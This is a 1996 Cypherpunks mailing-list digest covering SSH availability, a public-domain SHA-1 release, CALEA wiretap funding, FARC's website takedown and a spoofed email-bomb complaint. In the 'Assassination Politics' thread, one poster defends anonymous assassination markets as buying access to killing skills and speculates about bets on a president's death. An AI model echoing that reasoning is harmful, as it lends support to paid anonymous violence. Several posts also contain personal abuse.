:-) EBD > > > > > Jim Bell > jimbell at pacifier.com > From cadams at acucobol.com Thu Sep 26 18:03:27 1996 From: cadams at acucobol.com (Chris Adams) Date: Fri, 27 Sep 1996 09:03:27 +0800 Subject: Internet plug pulled on Colombia's guerrillas Message-ID: <324AFE43.46BE@acucobol.com> Internet plug pulled on Colombia's guerrillas 3:05pm EDT, 9/26/96 BOGOTA, Colombia - A Colombian guerrilla group currently involved in a bloody offensive in the mountains and jungles, suffered a setback in its propaganda battle when its new-tech voice on the Internet was mysteriously silenced. The Revolutionary Armed Forces of Colombia (FARC), which has periodically paralyzed half the country with road blocks, found its route to the information superhighway barred. The Communist insurgents, who rose up in arms in 1964, embraced new technology last year in their fight to overthrow the government by launching a home page on the Internet. But in unexplained circumstances, which a spokeswoman for the Mexico City-based Internet provider Teesnet said may or may not be linked to external pressures, the plug was pulled on the service Monday -- a day after being publicized in Colombia's leading daily, El Tiempo. The FARC's Mexico City-based international spokesman Marco León Calarcá admitted the loss of the Internet page was a serious reversal but vowed the computer-age conflict was far from over. "This is an attack on freedom of expression because we were not doing anything illegal. I cannot say exactly how it happened but the hand of the Colombian government is in this," he said. "The FARC is used to difficulties and this is just the latest challenge. One way or another we will get back on to the Internet." The Colombian guerrillas used their worldwide web site to publish their political magazine Resistencia, whose distribution is banned in Colombia, and to offer explanations about their latest armed actions. FARC, labeled narcoguerrillas since the 1980s when U.S.
ambassador Lewis Tambs highlighted the group's alleged connections with Colombia's drugs trade, have been dubbed Cyberspace guerrillas since their appearance on the Internet. "Cyberspace guerrillas may seem a fun name but I think it is pejorative and belittles what we're doing," said León Calarcá. "We are looking to topple the government and set up a new Colombia. "Using weapons naturally comes within the logic of the armed struggle. Just fighting through the Internet would be like shooting rubber bullets. Not using it would be like continuing to fight the army with a 12-bore shotgun," he said. In the four weeks since the FARC unleashed its latest offensive with an attack on a jungle base in southern Putumayo province, more than 150 soldiers, police and civilians have died. From bdavis at thepoint.net Thu Sep 26 18:06:33 1996 From: bdavis at thepoint.net (Brian Davis) Date: Fri, 27 Sep 1996 09:06:33 +0800 Subject: Lexis and Privacy - Bill approaches. In-Reply-To: Message-ID: On Wed, 25 Sep 1996, Declan McCullagh wrote: > Dear PhneCards, > > Please stop using my email address as part of an inappropriate email > bomb. If this continues, I will be forced to persecute your return > email address. > > Now we don't want that to happen, do we? > > -Declan > On Wed, 25 Sep 1996 PhneCards at aol.com wrote: > > > > > Did you know this company is using your email address as part of > > an unlawful email bomb? > > > > I would advise you to write to them at cypherpunks at toad.com > > and owner-cypherpunks at toad.com and advise them to stop > > using your email address for this type of activity. > > > > It is illegal to use an invalid return email address. If this continues, I > > will > > be forced to prosecute the return email address - which they are > > making to look like you. I got a similar message from those idiots and replied off list (part of my email bomb, I guess). Their email is terrific -- save it for evidence.
They *admit* that they know you aren't doing what they are complaining about, but threaten to sue you anyway. I hope their lawyers have read Civil Rule 11 ... on second thought, I hope they haven't!$$$$$! EBD From dwa at corsair.com Thu Sep 26 18:12:06 1996 From: dwa at corsair.com (Dana W. Albrecht) Date: Fri, 27 Sep 1996 09:12:06 +0800 Subject: ssh - How widely used? Message-ID: <199609262257.PAA05678@vishnu.corsair.com> Black Unicorn writes: > Does anyone know if there are MS-Dos or Mac versions of the ssh client? There is no MS-DOS client. The authors claim that, "a Macintosh version is in the works, and first versions are expected to be available in August/September 1996." There are Windoze and OS/2 clients. > How much is ssh used? From the FAQ: 6.2 How widespread is use of ssh? As with every piece of freely available software, this is difficult to find out. The best current estimates are that at least 1000 institutions in 40 countries use it. This estimate is based on The number of people on the ssh mailing list, around 600, from 40 different countries and several hundred domains. Each week, the ssh home pages are accessed from roughly 5000 different machines, many of them web caches; also, these machines often are different from week to week. > I've not seen much discussion of it but poking around an ISP yielded this: > > Ssh (Secure Shell) a program for logging into a remote > machine and for executing commands in a remote machine. > It is intended to replace rlogin and rsh, and provide > secure encrypted communications between two untrusted > hosts over an insecure network. X11 connections and > arbitrary TCP/IP ports can also be forwarded over the secure > channel. [ Snip ] > Looks like a nice little implementation. > > Comments anyone? For further information about it, see: http://www.cs.hut.fi/ssh/ There is also a mailing list. Subscription requests should be directed to majordomo at clinet.fi with "subscribe ssh" in the message body.
I think that it's technically a great program. However, I have heard some pretty unpleasant stories about legal issues using it in a commercial environment. Dana W. Albrecht dwa at corsair.com From pgf at acadian.net Thu Sep 26 18:57:34 1996 From: pgf at acadian.net (Phil Fraering) Date: Fri, 27 Sep 1996 09:57:34 +0800 Subject: Weaknesses in Smart Cards? (Re: FLA_wed) In-Reply-To: Message-ID: On Thu, 26 Sep 1996, Timothy C. May wrote: [... much deleted but boiling down to: ] > Not a good journalistic trend, in my opinion. Yah, but since 40-bit cyphers is seen by the "media" as something most people don't use, but "smart cards" are just another type of fraud-resistant credit card being used by Everyone Already, of course, they have to start a stampede now. I wonder if this isn't just plain Fear, Uncertainty, and Doubt rearing its ugly head... does Lucent (they were the ones, right?) have a competing product? Phil Fraering The above is the opinion of neither my internet pgf at acadian.net service provider nor my employer. 318/261-9649 From adam at homeport.org Thu Sep 26 19:02:27 1996 From: adam at homeport.org (Adam Shostack) Date: Fri, 27 Sep 1996 10:02:27 +0800 Subject: ssh - How widely used? In-Reply-To: Message-ID: <199609270039.TAA05797@homeport.org> There's a windows version, mac is under vague development. SSH is pretty cool, but the code base is somewhat messy, and it shows signs of its origins in things like systems calls not having their return values checked. Despite all this, I use it, like it, and recommend it for use in systems not likely to come under attack by professionals. Adam Black Unicorn wrote: | Does anyone know if there are MS-Dos or Mac versions of the ssh client? | How much is ssh used? | | I've not seen much discussion of it but poking around an ISP yielded this: | | Ssh (Secure Shell) a program for logging into a remote | machine and for executing commands in a remote machine.
| It is intended to replace rlogin and rsh, and provide | secure encrypted communications between two untrusted | hosts over an insecure network. X11 connections and | arbitrary TCP/IP ports can also be forwarded over the secure | channel. -- "It is seldom that liberty of any kind is lost all at once." -Hume From steve at edmweb.com Thu Sep 26 19:16:02 1996 From: steve at edmweb.com (Steve Reid) Date: Fri, 27 Sep 1996 10:16:02 +0800 Subject: Public domain SHA-1 in C Message-ID: -----BEGIN PGP SIGNED MESSAGE----- I've written an implementation of SHA-1 in C. Public domain, so you can hack it to your heart's content and/or use it however you want. You can download it from http://www.edmweb.com/steve/sha1.c It's not hard to use. Allocate a SHA1_CTX, initialize it with SHA1Init() run over the data with SHA1Update() and finally extract the result using SHA1Final(). Or just compile the program as-is and use it to hash files. It's reasonably fast (the 80 core SHA operations look good) but I'm certain that there's room for improvement. Tested under FreeBSD 2.1.0-RELEASE on an i486SX. The three test vectors from FIPS PUB 180-1 hash correctly. ===================================================================== | Steve Reid - SysAdmin & Pres, EDM Web (http://www.edmweb.com/) | | Email: steve at edmweb.com Home Page: http://www.edmweb.com/steve/ | | PGP (2048/9F317269) Fingerprint: 11C89D1CD67287E68C09EC52443F8830 | | -- Disclaimer: JMHO, YMMV, TANSTAAFL, IANAL.
-- | ===================================================================:) From snow at smoke.suba.com Thu Sep 26 19:19:49 1996 From: snow at smoke.suba.com (snow) Date: Fri, 27 Sep 1996 10:19:49 +0800 Subject: Public Schools In-Reply-To: <3.0b19.32.19960923103721.00a13340@panix.com> Message-ID: <199609262259.RAA00119@smoke.suba.com> > > On Sun, 22 Sep 1996, snow wrote: > >I would agree that parents can do as good or better at _most_ > >subjects thru about the 3rd or 4th grade, and I do agree that > >most of todays schools are shit, however there is one area-- > >social skills--that homeschooling simply can't compete. > > >From John Holt's "Teach Your Own" > > "If there were no other reason to homeschool your children, protecting them > from the 'valuable social atmosphere' of the schools would be sufficient." > John was a commie liberal BTW. He felt that the schools had a very nasty > and artificial social environment with rigid age segregation that bore no > resemblance to real life where there are people of wider age ranges. > Certainly, most people suffer worse mistreatment from their "peers" at > school than they do later in life. > As a libertarian, I would add that the social atmosphere of a Stalinist > "brain factory" is not exactly the socialization I would choose for my > children. I would choose a more market oriented model. As I indicated (or at least tried to) I am not satisfied with the way that schools are run.
I _don't_ think that this separation into classes by age is a good idea, I don't believe that self esteem is more important than learning.

However I DO believe that socialization is necessary. I do believe that the torture we all endured (and I as much or more than most) from our fellow students helps us later in life. If nothing else it teaches us that our fellow "humans" are not "humane".

I think a more market oriented model would be a good idea, assuming that you mean a model designed to produce a product--well educated young adults--and not simply "worker factories".

Petro, Christopher C.
petro at suba.com
snow at smoke.suba.com

From declan at well.com Thu Sep 26 19:20:16 1996
From: declan at well.com (Declan McCullagh)
Date: Fri, 27 Sep 1996 10:20:16 +0800
Subject: CWD -- Wiretap In the Night
Message-ID:

---------- Forwarded message ----------
Date: Thu, 26 Sep 1996 16:32:01 -0700 (PDT)
From: Declan McCullagh
To: fight-censorship at vorlon.mit.edu
Subject: CWD -- Wiretap In the Night

CyberWire Dispatch // September // Copyright (c) 1996 //

Jacking in from the "Smoked Filled Room" Port:

Washington, DC -- Federal provisions funding the digital telephony bill and roving wiretaps, surgically removed earlier this year from an anti-terrorism bill, have quietly been wedged into a $600 billion omnibus spending bill.

The bill creates a Justice Department "telecommunications carrier compliance fund" to pay for the provisions called for in the digital telephony bill, formally known as the Communications Assistance in Law Enforcement Act (CALEA). In reality, this is a slush fund.

Congress originally budgeted $500 million for CALEA, far short of the billions actually needed to build in instant wiretap capabilities into America's telephone, cable, cellular and PCS networks. This bill now approves a slush fund of pooled dollars from the budgets of "any agency" with "law enforcement, national security or intelligence responsibilities."
That means the FBI, CIA, NSA and DEA, among others, will now have a vested interest in how the majority of your communications are tapped.

The spending bill also provides for "multipoint wiretaps." This is the tricked up code phrase for what amounts to roving wiretaps. Where the FBI can only tap one phone at a time in conjunction with an investigation, it now wants the ability to "follow" a conversation from phone to phone; meaning that if your neighbor is under investigation and happens to use your phone for some reason, your phone gets tapped. It also means that the FBI can tap public pay phones... think about that next time you call 1-800-COLLECT.

In addition, all the public and congressional accountability provisions for how CALEA money was spent, which were in the original House version (H.R. 3814), got torpedoed in the Senate Appropriations Committee.

Provisions stripped out by the Senate:

-- GONE: Money isn't to be spent unless an implementation plan is sent to each member of the Judiciary Committee and Appropriations committees.

-- GONE: Requirement that the FBI provide public details of how its new wiretap plan exceeds or differs from current capabilities.

-- GONE: Report on the "actual and maximum number of simultaneous surveillance/intercepts" the FBI expects. The FBI ran into a fire storm earlier this year when it botched its long overdue report that said it wanted the capability to tap one out of every 100 phones *simultaneously*. Now, thanks to this funding bill, rather than having to defend that request, it doesn't have to say shit.

-- GONE: Complete estimate of the full costs of deploying and developing the digital wiretapping plan.

-- GONE: An annual report to Congress "specifically detailing" how all taxpayer money -- YOUR money -- is spent to carry out these new wiretap provisions.
"No matter what side you come down on this (digital wiretapping) issue, the stakes for democracy are that we need to have public accountability," said Jerry Berman, executive director of the Center for Democracy and Technology.

Although it appeared that no one in congress had the balls to take on the issue, one stalwart has stepped forward, Rep. Bob Barr (R-Ga.). He has succeeded in getting some of the accountability provisions back into the bill, according to a Barr staffer. But the fight couldn't have been an easy one. The FBI has worked congress relentlessly in an effort to skirt the original reporting and implementation requirements as outlined in CALEA. Further, Barr isn't exactly on the FBI's Christmas card list. Last year it was primarily Barr who scotched the funding for CALEA during the 104th Congress' first session.

But Barr has won again. He has, with backing from the Senate, succeeded in *putting back* the requirement that the FBI must justify all CALEA expenditures to the Judiciary Committee. Further, the implementation plan, "though somewhat modified" will "still have some punch," Barr's staffer assured me. That includes making the FBI report on its expected capacities and capabilities for digital wiretapping. In other words, the FBI won't be able to "cook the books" on the wiretap figures in secret. Barr also was successful in making the Justice Department submit an annual report detailing its CALEA spending to Congress.

However, the funding for digital wiretaps remains. Stuffing the funding measures into a huge omnibus spending bill almost certainly assures its passage. Congress is twitchy now, anxious to leave. They are chomping at the bit, sensing the end of the 104th Congress' tortured run as the legislative calendar is due to run out sometime early next week.
Then they will all literally race from Capitol Hill at the final gavel, heading for the parking lot, jumping in their cars like stock car drivers as they make a mad dash for National Airport to return to their home districts in an effort to campaign for another term in the loopy world of national politics.

Congress is "going to try to sneak this (spending bill) through the back door in the middle of the night," says Leslie Hagan, legislative director for the National Association of Criminal Defense Lawyers. She calls this a "worst case scenario" that is "particularly dangerous" because the "deliberative legislative process is short-circuited."

Such matters as wiretapping deserve to be aired in the full sunlight of congressional hearings, not stuffed into an 11th hour spending bill. This is legislative cowardice. Sadly, it will most likely succeed.

And through this all, the Net sits mute.

Unlike a few months ago, on the shameful day the Net cried "wolf" over these same provisions, mindlessly flooding congressional switchboards and any Email box within keyboard reach, despite the fact that the funding provisions had already been stripped from the anti-terrorism bill, there has been no hue-and-cry about these most recent moves.

Yes, some groups, such as the ACLU, EPIC and the Center for Democracy and Technology have been working the congressional back channels, buzzing around the frenzied legislators like crazed gnats.

But why haven't we heard about all this before now? Why has this bill come down to the wire without the now expected flurry of "alerts" "bulletins" and other assorted red-flag waving by our esteemed Net guardians? Barr's had his ass hanging in the wind, fighting FBI Director Louis "Teflon" Freeh; he could have used some political cover from the cyberspace community. Yet, if he'd gone to that digital well, he'd have found only the echo of his own voice.

And while the efforts of Rep. Barr are encouraging, it's anything from a done deal.
"As long as the door is cracked... there is room for mischief," said Barr's staffer. Meaning, until the bill is reported and voted on, some snapperhead congressman could fuck up the process yet again.

We all caught a bit of a reprieve here, but I wouldn't sleep well. This community still has a lot to learn about the Washington boneyard. Personally, I'm a little tired of getting beat up at every turn. Muscle up, folks, the fight doesn't get any easier.

Meeks out...

------------

Declan McCullagh contributed to this report.

###

From craigw at dg.ce.com.au Thu Sep 26 19:34:55 1996
From: craigw at dg.ce.com.au (craigw at dg.ce.com.au)
Date: Fri, 27 Sep 1996 10:34:55 +0800
Subject: An idle thought on CBC and block lengths
Message-ID: <199609262359.JAA18913@mac.ce.com.au>

Well I do believe that your spam would be illegal if that was the case. And secondly there are no laws here in Australia that you can use to prosecute me from the US for an email bomb, not that this is one, and if it is then so is your spam.

>> It is illegal to use an invalid return email address. If this continues, I
>> will
>> be forced to prosecute the return email address - which they are
>> making to look like you.

>Is it? I believe that if you look closely, you will discover that all the
>laws which would have made lying illegal on the 'Net have now been
>repealed by more Federal judges than I can count on 1 hand...

Soon, we may all be staring at our computers, wondering
whether they're staring back.

[Network Admin For WPA Business Products. aka doshai >;-) ]
http://pip.com.au/~doshai/

Key fingerprint = 2D F4 54 BB B4 EA F1 E7 B6 DE 48 92 FC 8D FF 49
Send a message with the subject "send pgp-key" for a copy of my key.
(if I want to give it to you)

From snow at smoke.suba.com Thu Sep 26 19:56:42 1996
From: snow at smoke.suba.com (snow)
Date: Fri, 27 Sep 1996 10:56:42 +0800
Subject: possible solution to cyber S/N
In-Reply-To: <199609231847.LAA29832@netcom5.netcom.com>
Message-ID: <199609262329.SAA00222@smoke.suba.com>

Mr. Nuri wrote:
> in the scientific arena. a paper that is pivotal and influential
> is referred to ad infinitum. obscure papers are forgotten and
> never referred to in subsequent literature.
> taking this idea to the cyberspace arena, the application is
> immediately obvious-- pages that are linked to by a lot of
> other pages are valuable, those that are not are not as
> valuable.

I'd bet that there are more links to playboy.com or "xxx.sex.com" than to thomas.loc.gov.

This suffers from the fatal flaw of democracy, the assumption that one million people are smarter than 10.

Who was it that said "No one ever went broke underestimating the intelligence of the average American"?

Petro, Christopher C.
petro at suba.com
snow at smoke.suba.com

From ponder at freenet.tlh.fl.us Thu Sep 26 20:01:06 1996
From: ponder at freenet.tlh.fl.us (P. J. Ponder)
Date: Fri, 27 Sep 1996 11:01:06 +0800
Subject: NIST conference
Message-ID:

Following is an announcement about a NIST conference on leveraging the distributed nature of the Internet to accomplish tasks that might be otherwise not feasible. The abstract notes that this type of activity has 'important economic, social, and political consequences'.

This may already be old news, I was off the list for the past few days.
Date: Thu, 26 Sep 1996 15:18:08 -0400
From: Liz Lennon
Subject: Cyber Conference Announcement
To: csl-bulletin at NIST.GOV

>Return-Path:
>Date: Thu, 26 Sep 1996 15:00:46 -0400 (EDT)
>From: Judi Moline
>Subject: Cyber Conference Announcement
>To: elizabeth.lennon at NIST.GOV
>Cc: moline at sst.ncsl.nist.gov
>
>
>Event: Conference on Leveraging Cyberspace
>
>Date: October 8-9, 1996
>
>Purpose: People with shared interests are using the Internet to
>solve problems, accomplish tasks, and create resources that would be well
>beyond the reach of any one person or organization. The ability to leverage
>the efforts of large numbers of networked users has important economic,
>social, and political consequences. This conference is designed to explore
>this phenomenon from both a technical and social science perspective.
>Additionally, the closing session of the conference will cap off several
>weeks of virtual discussions on the conference's web site.
>
>Location: Xerox Palo Alto Research Center (PARC)
>          Palo Alto, Calif.
>
>Keynote by: John Seely Brown, Vice President and Chief Scientist,
>          Xerox
>
>Program: Web: http://nii.nist.gov/cyber/cyber_conf.html
>
>Registration: $200
>
>Sponsors: White House National Economic Council
>          Commerce's National Institute of Standards and
>          Technology
>          Xerox Palo Alto Research Center
>
>Technical contact: Judi Moline, NIST
>          (301) 975-4601
>          email: jmoline at nist.gov
>
>Information: Web: http://nii.nist.gov/cyber/cyber_conf.html
>
>To register: Print registration form from web site and return with
>          payment to:
>          Office of the Comptroller
>          NIST
>          A807 Administration Building
>          Gaithersburg, Md. 20899-0001 USA
>
>          Or fax to:
>          Lori Phillips, NIST
>          fax: (301) 948-2067
>
>          Or:
>          Lori.Phillips at nist.gov
>
>
>

From roger at coelacanth.com Thu Sep 26 20:49:33 1996
From: roger at coelacanth.com (Roger Williams)
Date: Fri, 27 Sep 1996 11:49:33 +0800
Subject: ssh - How widely used?
In-Reply-To:
Message-ID:

Rats, just a clarification:

>>>>> "I" == Roger Williams blurted out:

> There is certainly a Mac version...

Umm, Machten, that is. I don't think that the straight Mac version has been released for beta yet.

> The SSH home page is .

Or at http://www.cs.hut.fi/ssh/, if you want it in *English*...

--
Roger Williams            finger me for my PGP public key
Coelacanth Engineering    consulting & turnkey product development
Middleborough, MA         wireless * DSP-based instrumentation * ATE
tel +1 508 947-8049 * fax +1 508 947-9118 * http://www.coelacanth.com/

From snow at smoke.suba.com Thu Sep 26 21:04:53 1996
From: snow at smoke.suba.com (snow)
Date: Fri, 27 Sep 1996 12:04:53 +0800
Subject: Hallam-Baker demands more repudiations or he'll write!
In-Reply-To:
Message-ID: <199609270005.TAA00319@smoke.suba.com>

Mr. May wrote:
> At 2:10 AM 9/24/96, hallam at vesuvius.ai.mit.edu wrote:
> >like Markof are somewhat more responsible. This is not going to stop me
> >from producing an op-ed piece linking the net libertarians to assassination
> >politics unless I hear a few more repudiations of Bell's ideas. If you
> >don't very clearly reject his murderous ideas you are going to regret it
> >just as the left regretted having the USSR or the RAF associated with them.
> I for one don't respond well to extortion threats, so write your damned article.

I agree with Mr. May, and I will go so far as to call you a coward and a thoroughly lousy human being.

I don't LIKE the idea of AP being necessary, and I am hoping that things get better before someone gets desperate enough to implement it.

On the other hand, I like living in a cage of someone else's making. If I choose to restrict my life, it is mine to restrict. I don't want you to have that ability.

You obviously come from a family that believes it is Ok to "Rule" people.

I wrote some fairly hostile shit about you and your family, but that is pretty irrelevant to this list, so I discarded it.
I will, however, say that you are a bloody fascist piece of work.

Petro, Christopher C.
petro at suba.com
snow at smoke.suba.com

From snow at smoke.suba.com Thu Sep 26 21:14:12 1996
From: snow at smoke.suba.com (snow)
Date: Fri, 27 Sep 1996 12:14:12 +0800
Subject: Tamper-Resistant Software from INTEL
In-Reply-To: <199609242330.SAA16789@oak.zilker.net>
Message-ID: <199609270057.TAA00414@smoke.suba.com>

Mr. Guthery
> Has anybody heard of tamper-resistant software in general or a method
> for tamper-resistant software from Intel in particular?

What do you mean by "tamper resistant"?

Petro, Christopher C.
petro at suba.com
snow at smoke.suba.com

From jya at pipeline.com Thu Sep 26 21:23:31 1996
From: jya at pipeline.com (John Young)
Date: Fri, 27 Sep 1996 12:23:31 +0800
Subject: NISSC
Message-ID: <199609270103.BAA27705@pipe2.ny2.usa.pipeline.com>

The National Information Systems Security Conference in Baltimore on October 22-25 is bountifully described at:

http://csrc.nist.gov/nissc/program

Section No. 10, Solutions, will interest those who want a peek at what the Puzzle Palace gang is up to.

The other nine sessions cover everything the info-sec gov-biz wants to do to make the infoworld safe from everyone except them.

From roger at coelacanth.com Thu Sep 26 21:23:33 1996
From: roger at coelacanth.com (Roger Williams)
Date: Fri, 27 Sep 1996 12:23:33 +0800
Subject: ssh - How widely used?
In-Reply-To:
Message-ID:

>>>>> Black Unicorn writes:

> Does anyone know if there are MS-Dos or Mac versions of the ssh
> client? How much is ssh used?

There is certainly a Mac version, as well as ones for OS/2 and probably every Unix platform. There's also a Windows client. (We use SSH on OS/2 and Linux, but haven't yet had to try the Windows client.)

The SSH home page is .
--
Roger Williams            finger me for my PGP public key
Coelacanth Engineering    consulting & turnkey product development
Middleborough, MA         wireless * DSP-based instrumentation * ATE
tel +1 508 947-8049 * fax +1 508 947-9118 * http://www.coelacanth.com/

From shamrock at netcom.com Thu Sep 26 21:29:08 1996
From: shamrock at netcom.com (Lucky Green)
Date: Fri, 27 Sep 1996 12:29:08 +0800
Subject: ssh - How widely used?
In-Reply-To:
Message-ID:

On Thu, 26 Sep 1996, Black Unicorn wrote:
>
> Does anyone know if there are MS-Dos or Mac versions of the ssh client?
> How much is ssh used?

Uni, SSH is used, as most security software is, by security aware individuals. I would love to say that means "widely", but unfortunately that isn't the case.

For what it is worth, SSH has my personal seal of approval. Use it. The UNIX version is freeware. The Windows version is commercially available at http://www.datafellows.com/

--Lucky

From snow at smoke.suba.com Thu Sep 26 21:30:05 1996
From: snow at smoke.suba.com (snow)
Date: Fri, 27 Sep 1996 12:30:05 +0800
Subject: Bork book
In-Reply-To: <3247E5B8.6181@tivoli.com>
Message-ID: <199609270016.TAA00338@smoke.suba.com>

Mr. Nally wrote:
> Bork came across as kind-of a jerk, personality-wise.

I listened to him speak on Mr. Limbaugh's show the other day where the round mound of sound all but blew him on the air. He didn't come across as a jerk to me. More like a fascist prick.

If he had made it to the Supreme Court, there is no doubt in my mind where he would fall on the crypto debate.

Petro, Christopher C.
petro at suba.com
snow at smoke.suba.com

From drink at aa.net Thu Sep 26 21:30:14 1996
From: drink at aa.net (!
Drive)
Date: Fri, 27 Sep 1996 12:30:14 +0800
Subject: PGP interfaces for MS Internet Mail
Message-ID: <199609270008.RAA16947@ws6.aa.net>

Does anyone know of any PGP programs that interface well with Microsoft's Internet Mail (not Exchange mail)

Thanks

From snow at smoke.suba.com Thu Sep 26 21:36:24 1996
From: snow at smoke.suba.com (snow)
Date: Fri, 27 Sep 1996 12:36:24 +0800
Subject: AP Protocol Failures [NOISE]
In-Reply-To: <199609241701.NAA16848@attrh1.attrh.att.com>
Message-ID: <199609270037.TAA00384@smoke.suba.com>

> >> Troops are in Northern Ireland for a very simple and depressing
> >> reason. People like Jim want to impose their will on others by force.
> But AP is great - adding more violence to Ireland is just the thing
> they need........

It wouldn't ADD more violence.

> One of the strong negatives of AP is that it leads to reverse AP -
> if you don't know _which_ Hatfield killed the latest McCoy,
> you might as well just shoot one or two Hatfield Boys at random.
> If you kill off GrandDaddy Hatfield, there's nobody to say
> "OK, let's stop shooting each other"; instead there's a bunch of
> angry grandkids, and uncles, _all_ of whom have the
> authority to say "Let's go kill the McCoy bastards who did this!"
> The protocols may work when there's one hierarchical target -
> they don't work with two. Hammurabi's law about "An eye for an eye
> and a tooth for a tooth" was a _limitation_ on the amount of vengeance
> you were allowed to take, not a minimum required vengeance.

Putting AP into place doesn't make murder legal. You could still be arrested, tried (depending on the jurisdiction) and punished for it. All AP allows is people who don't have the skills necessary to do the job pay for it.

Wait, that didn't come out right.

AP simply allows people without the assassination skill set to purchase access to those skill sets anonymously.

There are many, many people out there who are either too squeamish to kill, or are philosophically opposed to killing.
They won't use this system. There are many others without the skills necessary to kill higher level targets without getting caught.

Without getting caught. That is the key.

There is a very good chance would AP be implemented that someone might put make a bet on me. I tend to piss people off. I am also a slightly harder target than Joe Average. Not much, because of the neighborhood I live in. Around here you could probably buy my death for a $100 bucks worth of crack. Of course, the police will investigate, and since I am white, and not involved with gangs and drugs, they might even bother to find out who whacked me.

If someone hits Bill Clinton, then there is a very good chance that many many people will be wondering who won the bet. While it isn't possible (assuming here) to trace the bet side, the assassination is an event that takes place in the real world where physical evidence is considerably difficult to obscure.

There will be people looking for both killers, but I'd bet that the people investigating Clintons death would be much more likely to be bet against than those investigating mine.

Petro, Christopher C.
petro at suba.com
snow at smoke.suba.com

From markm at voicenet.com Thu Sep 26 21:45:29 1996
From: markm at voicenet.com (Mark M.)
Date: Fri, 27 Sep 1996 12:45:29 +0800
Subject: ssh - How widely used?
In-Reply-To:
Message-ID:

-----BEGIN PGP SIGNED MESSAGE-----

On Thu, 26 Sep 1996, Black Unicorn wrote:

> Does anyone know if there are MS-Dos or Mac versions of the ssh client?

There isn't a Mac version yet, but there is a beta version for Windows. Information is available at http://www.ssh.fi.

> How much is ssh used?

It seems to be pretty widespread. A lot of security conscious ISP's run sshd and I think there will be an RFC on ssh eventually.

> Looks like a nice little implementation.
>
> Comments anyone?

It's really a very good program. The code is huge, so it is somewhat difficult to really be certain that there aren't any holes somewhere in the program.
There also isn't much key management which makes MITM attacks easier. But that would make it even more complex.

Mark
- --
PGP encrypted mail preferred.
Key fingerprint = d61734f2800486ae6f79bfeb70f95348
http://www.voicenet.com/~markm/

From snow at smoke.suba.com Thu Sep 26 21:46:30 1996
From: snow at smoke.suba.com (snow)
Date: Fri, 27 Sep 1996 12:46:30 +0800
Subject: SAY WHAT? [Hallam-Baker demands more repudiations or he'll write!]
In-Reply-To: <3248DE04.5363@gte.net>
Message-ID: <199609270111.UAA00449@smoke.suba.com>

Mr. Thorn wrote:
> Maybe, instead of having to face the (alleged) horror of AP, you could
> join with other like-minded citizens and stop these atrocities from the
> top down, if you have the nerve to go toe-to-toe with "the real
> killers", government-style.
>

Remember that comment about his cousin? He is one of the "REAL KILLERS".

Petro, Christopher C.
petro at suba.com
snow at smoke.suba.com

From tcmay at got.net Thu Sep 26 21:48:53 1996
From: tcmay at got.net (Timothy C. May)
Date: Fri, 27 Sep 1996 12:48:53 +0800
Subject: Hallam-Baker demands more repudiations or he'll write!
In-Reply-To:
Message-ID:

>Mr. May wrote:
>> At 2:10 AM 9/24/96, hallam at vesuvius.ai.mit.edu wrote:
>> >like Markof are somewhat more responsible. This is not going to stop me
>> >from producing an op-ed piece linking the net libertarians to assassination
>> >politics unless I hear a few more repudiations of Bell's ideas.
If you
>> >don't very clearly reject his murderous ideas you are going to regret it
>> >just as the left regretted having the USSR or the RAF associated with them.
>> I for one don't respond well to extortion threats, so write your damned
>>article.
>
> I agree with Mr. May, and I will go so far as to call you a coward and
>a thoroughly lousy human being.

Now, now, let's not overreact. I named this thread, and yet I think even I was going too far. That is, I was just making the point that Phill's call for us to write denunciations or he would write an essay linking libertarians and cypherpunks to AP smacked to me of a kind of extortion.

Anyway, I had several e-mail exchanges (in private) with Phill on this subject, and I hardly think he's a "thoroughly lousy human being." I disagree with many of his political beliefs, he no doubt disagrees with many of mine (and even "ours," collectively), and in this particular case, his "extortion" was a mistake.

I say we move on.

--Tim May

We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May               | Crypto Anarchy: encryption, digital money,
tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA   | knowledge, reputations, information markets,
Higher Power: 2^1,257,787-1  | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."

From markm at voicenet.com Thu Sep 26 21:49:28 1996
From: markm at voicenet.com (Mark M.)
Date: Fri, 27 Sep 1996 12:49:28 +0800
Subject: Newsgroup proposal: misc.anonymous
In-Reply-To:
Message-ID:

-----BEGIN PGP SIGNED MESSAGE-----

On Thu, 26 Sep 1996, Robert Hettinga wrote:

> I do know that there was an alt.anonymous.messages, or some such. Haven't
> looked at it lately, but I don't remember too much traffic on it...

It is still active.
However, there are many people who do not receive the alt.* groups and those who do may only receive newsgroups "approved" by the news admin. It is much more difficult to restrict distribution of newsgroups carried by most major news feeds. Also, some NNTP servers may expire alt groups faster than the other hierarchies which is very undesirable for message pools.

Mark
- --
PGP encrypted mail preferred.
Key fingerprint = d61734f2800486ae6f79bfeb70f95348
http://www.voicenet.com/~markm/

From jamesd at echeque.com Thu Sep 26 22:03:01 1996
From: jamesd at echeque.com (James A. Donald)
Date: Fri, 27 Sep 1996 13:03:01 +0800
Subject: Cuba, Iraq, AP...
Message-ID: <199609270229.TAA03275@dns2.noc.best.net>

At 09:08 AM 9/26/96 -0500, Phil Fraering wrote:
> Shortly after the Gulf War elements in the Iraqi military tried to
> overthrow Hussein; they apparently tried to co-ordinate with the U.S., who
> tried to co-ordinate with Saudi Arabia, who warned Saddam that there was
> going to be a coup attempt; gotta stop that Ol' power vacuum...
>
> The fact that the people who performed the Bay of Pigs were enticed into
> it by promised but withdrawn U.S. military support is a matter of public
> record; would Castro still be in power had the United States not
> (intentionally? I don't know) destroyed the core resistance against him
> in that fashion?

Two rulers, one of whom is a communist, have more in common than two communists, one of whom is a ruler.
---------------------------------------------------------------------
                                      |
We have the right to defend ourselves | http://www.jim.com/jamesd/
and our property, because of the kind |
of animals that we are. True law      | James A. Donald
derives from this right, not from the |
arbitrary power of the state.         | jamesd at echeque.com

From jya at pipeline.com Thu Sep 26 22:03:45 1996
From: jya at pipeline.com (John Young)
Date: Fri, 27 Sep 1996 13:03:45 +0800
Subject: CWD--Wiretap In the Night
Message-ID: <199609270024.AAA25881@pipe2.ny2.usa.pipeline.com>

Adding to the CWD wiretap alarm by Brock and Declan:

The Washington Post, September 26, 1996, p. A30.

Wiretaps and Money Bills [Editorial]

